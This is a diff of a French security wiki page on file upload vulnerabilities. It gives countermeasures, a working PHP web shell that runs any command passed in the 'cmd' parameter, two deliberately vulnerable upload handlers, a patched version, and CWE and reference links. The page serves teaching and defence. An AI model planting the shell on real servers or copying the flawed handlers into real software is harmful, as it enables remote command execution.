Différences

Ci-dessous, les différences entre deux révisions de la page.

--- cyber:vulnerabilite:file_upload [2025/07/11 14:42] – [Description] admin
+++ cyber:vulnerabilite:file_upload [2025/07/11 14:47] (Version actuelle) – [Correction du code :] admin
@@ Ligne 48: / Ligne 48: @@
 Les contre-mesures suivantes peuvent être mises en œuvre :
   * S'assurer que le serveur web est à jour avec tous les correctifs pour être protégé contre les vulnérabilités connues ;
-  * S'assurer que les autorisations de fichiers dans les répertoires du serveur web à partir desquels les fichiers peuvent être exécutés sont définies sur les paramètres de {{"moindre privilège"}}, et que le contenu de ces répertoires est contrôlé par une liste d'autorisations ;
+  * S'assurer que les autorisations de fichiers dans les répertoires du serveur web à partir desquels les fichiers peuvent être exécutés sont définies sur les paramètres de **moindre privilège**, et que le contenu de ces répertoires est contrôlé par une liste d'autorisations ;
   * Contrôler les extensions des fichiers ainsi que leur MIME-type ;
   * Renommer les fichiers uploadés sur le système avec une chaîne de caractère aléatoire ;
@@ Ligne 55: / Ligne 55: @@
   * Limiter la taille des fichiers uploadés et la taille du nom du fichier, et filtrer les caractères spéciaux dans le nom du fichier ;
   * N'autoriser que les utilisateurs authentifiés à utiliser une fonction d'upload.
+====== Comment cela fonctionne ======
+===== Exemple 1 =====
+Le code suivant est un web shell basique. En exploitant une fonction d'envoi de fichier vulnérable sur un serveur PHP, on aura alors la possibilité d'exécuter des commandes arbitraires sur le système.
+Ce code reçoit un paramètre dans l'URL **cmd** correspondant à une commande shell (par exemple "cat /proc/version" ou encore "crontab -l") qui sera exécutée sur le système et dont le résultat sera affiché dans le corps HTML de la réponse HTTP :
+<code php>
+<html>
+<head>
+    <title>Command Execution Form</title>
+</head>
+<body>
+    <!-- Création d'un formulaire HTML avec la méthode "GET" et le nom du formulaire
+         basé sur le nom du fichier PHP en cours d'exécution -->
+    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+        <!-- Champ de saisie de texte où l'utilisateur peut entrer une commande à exécuter -->
+        <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+        <!-- Bouton de soumission pour exécuter la commande entrée -->
+        <input type="SUBMIT" value="Execute">
+    </form>
+    <!-- Zone de préformatage HTML où les résultats de la commande exécutée seront affichés -->
+    <pre>
+        <?php
+        // Vérification si le paramètre 'cmd' est défini dans la requête GET
+        if(isset($_GET['cmd']))
+        {
+            // Exécution de la commande passée par l'utilisateur en utilisant la fonction 'system'
+            system($_GET['cmd']);
+        }
+        ?>
+    </pre>
+</body>
+</html>
+</code>
+===== Exemple 2 =====
+Voici un exemple de code PHP d'une fonctionnalité d'envoi de fichier vulnérable :
+<code php>
+<!DOCTYPE html>
+<html>
+<head>
+    <title>File upload</title>
+</head>
+<body>
+<!-- Contenu principal de la page -->
+<div id="main">
+    <div class="container">
+        <div class="row">
+            <h1>File upload</h1>
+        </div>
+        <div class="row">
+            <p class="lead">
+                You can just upload [jpeg,gif] files.<br />
+                <!-- Paragraphe de texte indiquant les types de fichiers autorisés -->
+            </p>
+        </div>
+    </div>
+</div>
+<div class="container">
+    <div class="row">
+    <!-- Création d'un formulaire HTML avec la méthode POST pour envoyer le fichier sur le serveur -->
+        <form action="index.php" method="post" enctype="multipart/form-data">
+            <div class="form-group col-md-3">
+                <!-- Champ d'upload de fichier avec l'attribut "accept" pour accepter uniquement les fichiers jpeg et gif -->
+                <input type="file" id="fileToUpload" name="fileToUpload" accept="image/gif, image/jpeg" required>
+                <!-- Bouton de soumission du formulaire avec le texte "Upload" -->
+                <input type="submit" value="Upload" class="form-control btn btn-default" name="submit">
+            </div>
+        </form>
+    </div>
+    <?php
+    // Code PHP pour gérer l'upload du fichier
+    $target_dir = "uploads/"; // Répertoire de destination pour enregistrer le fichier
+    if(isset($_POST["submit"])) { // Vérification si le formulaire a été soumis
+        // Chemin complet pour enregistrer le fichier dans le répertoire de destination
+        $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
+        // Déplacement du fichier temporaire vers le répertoire de destination
+        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
+            // Affichage d'un message de succès avec le lien vers le fichier uploadé
+            echo "<p class=\"alert-success\">The file has been uploaded here: <a href=\"$target_file\">$target_file</a>.</p>";
+        } else {
+            // Affichage d'un message d'erreur en cas de problème lors de l'upload du fichier
+            echo "<p class=\"alert-danger\">Sorry, there was an error uploading your file.</p>";
+        }
+    }
+    ?>
+    <script type="text/javascript" src="../static/css/bootstrap.min.js"></script>
+</body>
+</html>
+<?php
+// Inclusion d'un fichier "footer.php" pour afficher le pied de page de la page web
+include ("../footer.php");
+?>
+</code>
+Ce code n'effectue aucun contrôle côté serveur sur la nature du fichier envoyé. Le seul contrôle effectué est réalisé côté client via le paramètre "accept" dans la balise <code><input type="file" id="fileToUpload" name="fileToUpload" accept="image/gif, image/jpeg" required></code>
+Ce contrôle peut facilement être contourné, par exemple à l'aide d'un proxy applicatif tel que BurpSuite. Un utilisateur malveillant peut alors envoyer n'importe quel type de fichier, comme par exemple un webshell.
+Pour prévenir l'exploitation de cette fonctionnalité, il aurait fallu implémenter des contrôles en PHP côté serveur sur le type MIME et l'extension du fichier envoyé, et renvoyer une erreur à l'utilisateur si le fichier ne correspond pas au type attendu.
+===== Exemple 3 =====
+Voici un exemple de code PHP vulnérable à des attaques de type MIME :
+<code php>
+<!DOCTYPE html>
+<html>
+<head>
+    <title>File Upload</title>
+</head>
+<body>
+    <h1>File Upload</h1>
+    <!-- Création d'un formulaire HTML avec la méthode POST -->
+    <form method="post" enctype="multipart/form-data">
+        <input type="file" name="fileToUpload" id="fileToUpload">
+        <!-- Bouton de soumission du formulaire -->
+        <input type="submit" value="Upload File" name="submit">
+    </form>
+    <?php
+    // Vérifier si le formulaire a été soumis
+    if(isset($_POST["submit"])) {
+        $target_dir = "uploads/"; // Répertoire de destination pour enregistrer le fichier
+        $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
+        $uploadOk = 1;
+        $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
+        // Vérifier si le fichier est une image réelle ou une image contrefaite
+        if(isset($_FILES["fileToUpload"])) {
+            $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
+            if($check !== false) {
+                echo "File is an image - " . $check["mime"] . ".";
+                $uploadOk = 1;
+            } else {
+                echo "File is not an image.";
+                $uploadOk = 0;
+            }
+        }
+        // Autoriser certains formats de fichiers uniquement
+        $allowedMimeTypes = array("image/jpeg", "image/png");
+        if(!in_array($_FILES["fileToUpload"]["type"], $allowedMimeTypes)) {
+            echo "Sorry, only JPG, JPEG, and PNG files are allowed.";
+            $uploadOk = 0;
+        }
+        // Vérifier si $uploadOk est mis à 0 par une erreur
+        if ($uploadOk == 0) {
+            echo "Sorry, your file was not uploaded.";
+        // Si tout est correct, essayez de télécharger le fichier
+        } else {
+            if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
+                echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
+            } else {
+                echo "Sorry, there was an error uploading your file.";
+            }
+        }
+    }
+    ?>
+</body>
+</html>
+</code>
+Ce code est une page web qui permet à l'utilisateur de télécharger un fichier sur le serveur via un formulaire. Cependant, il est vulnérable à des attaques de type MIME, ce qui signifie que des fichiers malveillants peuvent être téléchargés sur le serveur en utilisant des en-têtes MIME falsifiées.
+==== Correction du code : ====
+Pour résoudre cette vulnérabilité, il est nécessaire de vérifier le contenu réel du fichier plutôt que de se fier uniquement à l'en-tête MIME fournie par le client. Voici un patch qui améliore la sécurité du téléchargement de fichiers :
+<code php>
+<?php
+if(isset($_POST["submit"])) {
+    $target_dir = "uploads/";
+    $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
+    $uploadOk = 1;
+    $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
+    // Vérifier si le fichier est une image réelle
+    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
+    if($check === false) {
+        echo "File is not an image.";
+        $uploadOk = 0;
+    }
+    // Autoriser uniquement certains formats de fichiers
+    $allowedExtensions = array("jpg", "jpeg", "png");
+    if(!in_array($imageFileType, $allowedExtensions)) {
+        echo "Sorry, only JPG, JPEG, and PNG files are allowed.";
+        $uploadOk = 0;
+    }
+    // Vérifier si $uploadOk est mis à 0 par une erreur
+    if ($uploadOk == 0) {
+        echo "Sorry, your file was not uploaded.";
+    // Si tout est correct, essayez de télécharger le fichier
+    } else {
+        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
+            echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
+        } else {
+            echo "Sorry, there was an error uploading your file.";
+        }
+    }
+}
+?>
+</code>
+Avec ce patch, la vulnérabilité est corrigée en vérifiant le contenu réel du fichier avec getimagesize(). De plus, nous utilisons une liste blanche d'extensions de fichiers autorisées ($allowedExtensions) pour s'assurer que seuls les fichiers d'images avec des extensions spécifiques (JPG, JPEG et PNG) sont autorisés à être téléchargés. Cela rend le processus d'envoi plus sûr et prévient les attaques de type MIME.
+===== CWEs =====
+  * [[https://cwe.mitre.org/data/definitions/287.html|CWE-287 : Improper Authentication]]
+    * When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
+  * [[https://cwe.mitre.org/data/definitions/553.html|CWE-553 : Command Shell in Externally Accessible Directory]]
+    * A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.
+===== References =====
+URL :
+  * https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Secure%20file%20upload%20in%20PHP%20web%20applications.pdf
+  * https://github.com/flozz/p0wny-shell
+  * https://www.prplbx.com/resources/blog/exploiting-file-upload-vulnerabilities/
+  * https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
+  * https://book.hacktricks.xyz/pentesting-web/file-upload
+  * https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Webhacking:%20les%20failles%20php.pdf
+  * https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Securite%20PHP%20-%20Faille%20upload.pdf
 ====== Retour fiches vulnérabilités ======
   * [[cyber:vulnerabilite:accueil|Cyber fiches vulnérabilités]]